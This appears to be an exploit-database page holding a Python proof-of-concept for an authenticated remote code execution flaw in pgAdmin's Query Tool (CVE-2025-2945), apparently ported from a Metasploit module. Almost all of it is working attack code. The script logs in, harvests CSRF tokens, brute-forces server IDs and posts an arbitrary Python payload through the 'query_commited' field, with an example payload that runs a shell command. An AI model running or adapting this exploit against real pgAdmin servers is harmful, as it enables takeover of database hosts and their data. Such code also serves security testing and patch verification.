4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
import argparse
import json
import random
import sys
from urllib.parse import urljoin, urlencode

import requests
from faker import Faker

''''
The attacker must possess valid pgAdmin credentials (username/password) to log in via POST /login

Translated from Metasploit module “pgAdmin Query Tool authenticated RCE (CVE-2025-2945)”
- Original Ruby: https://github.com/rapid7/metasploit-framework
- This Python script reproduces the same steps:
    1) Authenticate to pgAdmin
    2) Initialize the SQL editor (gets a transaction ID, sgid, sid, did)
    3) Iterate over server IDs until one “works”
    4) POST a malicious payload via `query_commited` → expected 500 response
'''

fake = Faker()

class PgAdminExploit:
    def __init__(self, args):
        self.rhost = args.rhost
        self.rport = args.rport
        self.username = args.username
        self.password = args.password
        self.db_user = args.db_user
        self.db_pass = args.db_pass
        self.db_name = args.db_name
        self.max_server_id = args.max_server_id
        self.payload = args.payload
        self.scheme = "http"
        self.base_url = f"{self.scheme}://{self.rhost}:{self.rport}"
        self.session = requests.Session()
        # Some default headers—Metasploit’s HttpClient sets things like a User-Agent, etc.
        self.session.headers.update({
            "User-Agent": "Mozilla/5.0 (Exploit Script)",
        })

    def get_csrf_token(self, from_page="/"):
        """
        Attempt to pull CSRF token out of cookies or hidden fields.
        pgAdmin4 often sets one of:
          - a cookie named "pga_csrf_token" or "pgaCookieCsrfToken" or "csrftoken"
          - a hidden <input name="csrf_token" value="..."> in the login page
        We first do a GET to `from_page` so that cookies get set.
        """
        resp = self.session.get(urljoin(self.base_url, from_page), allow_redirects=True)
        # 1) Try known cookie names:
        for ck in ("pga_csrf_token", "pgaCookieCsrfToken", "csrftoken"):
            if ck in self.session.cookies:
                return self.session.cookies.get(ck)

        # 2) Fallback: try to parse a hidden input from HTML
        #    (in many pgAdmin versions, login page has: <input type="hidden" name="csrf_token" value="XXX">)
        text = resp.text
        marker = 'name="csrf_token" value="'
        idx = text.find(marker)
        if idx != -1:
            start = idx + len(marker)
            end = text.find('"', start)
            if end != -1:
                return text[start:end]

        print("[!] Unable to retrieve CSRF token. Exiting.")
        sys.exit(1)

    def authenticate(self):
        """
        Replicates the `authenticate(datastore['USERNAME'], datastore['PASSWORD'])` call
        in the Ruby module. We:
          1) GET /login to retrieve CSRF
          2) POST /login with form data {email, password, csrf_token}
        """
        print("[*] Fetching CSRF token from login page...")
        csrf_token = self.get_csrf_token("/login")

        login_url = urljoin(self.base_url, "/login")
        data = {
            "email": self.username,
            "password": self.password,
            "csrf_token": csrf_token
        }
        headers = {
            "Referer": login_url
        }
        resp = self.session.post(login_url, data=data, headers=headers, allow_redirects=False)
        # pgAdmin typically redirects to /browser/ if login succeeds
        if resp.status_code not in (302, 303):
            print(f"[!] Login failed or unexpected status code: {resp.status_code}")
            sys.exit(1)

        print("[+] Authenticated to pgAdmin successfully.")

    def get_post_data(self):
        """
        Translated from `get_post_data` in Ruby:
          title = Faker::App.name.downcase
          selectedNodeInfo => { database: { id: Faker::App.name.downcase } }
          return URI.encode_www_form(...)
        """
        title = fake.app_name().lower()
        db_id = fake.app_name().lower()
        payload_dict = {
            "title": title,
            "selectedNodeInfo": {
                "database": {
                    "id": db_id
                }
            }
        }
        # We return URL‐encoded form data (as a string)
        return urlencode(payload_dict)

    def post_initialize_sqleditor(self, trans_id, sgid, sid, did, csrf_token):
        """
        Equivalent to Ruby:
        send_request_cgi({
          'uri' => normalize_uri(target_uri.path, "/sqleditor/initialize/sqleditor/#{trans_id}/#{sgid}/#{sid}/#{did}"),
          'method' => 'POST',
          'keep_cookies' => true,
          'ctype' => 'application/json',
          'headers' => { 'X-pgA-CSRFToken' => csrf_token },
          'data' => {
            'user' => DB_USER,
            'password' => DB_PASS,
            'role' => '',
            'dbname' => DB_NAME
          }.to_json
        })
        """
        url = urljoin(self.base_url,
                      f"/sqleditor/initialize/sqleditor/{trans_id}/{sgid}/{sid}/{did}")
        headers = {
            "Content-Type": "application/json",
            "X-pgA-CSRFToken": csrf_token
        }
        data = {
            "user": self.db_user,
            "password": self.db_pass,
            "role": "",
            "dbname": self.db_name
        }
        print(f"[*] Initializing SQL editor: trans_id={trans_id}, sgid={sgid}, sid={sid}, did={did}")
        resp = self.session.post(url, headers=headers, json=data)
        if resp.status_code != 200:
            try:
                err = resp.json().get("result", {}).get("errmsg", "unknown error")
            except Exception:
                err = resp.text or "unknown error"
            print(f"[!] Failed to initialize sqleditor: {err}")
            sys.exit(1)
        print("[+] Successfully initialized sqleditor.")

    def find_valid_server_id(self, sgid, csrf_token):
        """
        Same as Ruby's find_valid_server_id(sgid):
          for sid in 1..MAX_SERVER_ID:
            GET /sqleditor/get_server_connection/{sgid}/{sid} with X-pgA-CSRFToken
            if response.data.status → return sid
          if none found, fail.
        """
        for sid in range(1, self.max_server_id + 1):
            print(f"[*] Trying server ID: {sid}")
            url = urljoin(self.base_url,
                          f"/sqleditor/get_server_connection/{sgid}/{sid}")
            headers = {
                "X-pgA-CSRFToken": csrf_token,
                "Content-Type": "application/x-www-form-urlencoded"
            }
            resp = self.session.get(url, headers=headers)
            if resp.status_code != 200:
                continue
            try:
                j = resp.json()
            except ValueError:
                continue
            # Ruby does: if res&.get_json_document&.dig('data','status')
            status = j.get("data", {}).get("status")
            if status:
                print(f"[+] Found valid server ID: {sid}")
                return sid

        print("[!] Failed to find a valid server ID. Try increasing MAX_SERVER_ID.")
        sys.exit(1)

    def sqleditor_init(self, trans_id, csrf_token):
        """
        Ruby:
          sgid = rand(1..10)
          did = rand(10000..99999)
          sid = find_valid_server_id(sgid)
          post_initialize_sqleditor(trans_id, sgid, sid, did)
        """
        sgid = random.randint(1, 10)
        did = random.randint(10000, 99999)
        sid = self.find_valid_server_id(sgid, csrf_token)
        self.post_initialize_sqleditor(trans_id, sgid, sid, did, csrf_token)
        # Return sgid, sid, did if needed later (not strictly required here)
        return sgid, sid, did

    def exploit(self):
        """
        Puts it all together:
          1) authenticate()
          2) trans_id = rand(1_000_000..9_999_999)
          3) sqleditor_init(trans_id)
          4) POST to /sqleditor/query_tool/download/{trans_id} with JSON { query_commited: payload }
             → expects a 500 response
        """
        self.authenticate()

        # Step 1: Generate a fresh transaction ID
        trans_id = random.randint(1_000_000, 9_999_999)
        print(f"[*] Generated transaction ID: {trans_id}")

        # Step 2: Get a fresh CSRF token (after login, cookies may have changed)
        print("[*] Fetching a fresh CSRF token for sqleditor operations...")
        csrf_token = self.get_csrf_token(f"/sqleditor/panel/{trans_id}?is_query_tool=true")

        # Step 3: Initialize the SQL editor (find sgid/sid/did + POST that info)
        self.sqleditor_init(trans_id, csrf_token)

        # Step 4: Send the final exploit payload
        print("[*] Exploiting the target by sending payload...")
        exploit_url = urljoin(self.base_url, f"/sqleditor/query_tool/download/{trans_id}")
        headers = {
            "Content-Type": "application/json",
            "X-PgA-CSRFToken": csrf_token,
            # The Metasploit module also sent a Referer header:
            "Referer": f"{self.base_url}/sqleditor/panel/{trans_id}?is_query_tool=true"
        }
        data = {
            "query_commited": self.payload
        }
        resp = self.session.post(exploit_url, headers=headers, json=data, allow_redirects=False)

        if resp is None:
            print("[!] No response received from exploit attempt.")
            sys.exit(1)

        if resp.status_code == 500:
            print("[+] Received a 500 response from the exploit attempt (expected).")
            print("[+] If the payload is correct, remote code execution should have occurred.")
        else:
            print(f"[!] Received an unexpected response code: {resp.status_code}")
            print(f"    Response body:\n{resp.text}")

def main():
    parser = argparse.ArgumentParser(description="pgAdmin Query Tool authenticated RCE (CVE-2025-2945) exploit in Python")
    parser.add_argument("--rhost", required=True, help="Target pgAdmin host (IP or hostname)")
    parser.add_argument("--rport", required=False, type=int, default=80, help="Target pgAdmin port (default: 80)")
    parser.add_argument("--username", required=True, help="pgAdmin username")
    parser.add_argument("--password", required=True, help="pgAdmin password")
    parser.add_argument("--db-user", dest="db_user", required=True, help="Database user (to initialize SQL editor)")
    parser.add_argument("--db-pass", dest="db_pass", required=True, help="Database password")
    parser.add_argument("--db-name", dest="db_name", required=True, help="Database name")
    parser.add_argument("--payload", required=True,
                        help="Arbitrary Python payload to send in `query_commited`. (e.g. \"__import__('os').system('id')\")")
    parser.add_argument("--max-server-id", dest="max_server_id", type=int, default=10,
                        help="Maximum number of server IDs to try (default: 10)")
    args = parser.parse_args()

    exploit = PgAdminExploit(args)
    exploit.exploit()

if __name__ == "__main__":
    main()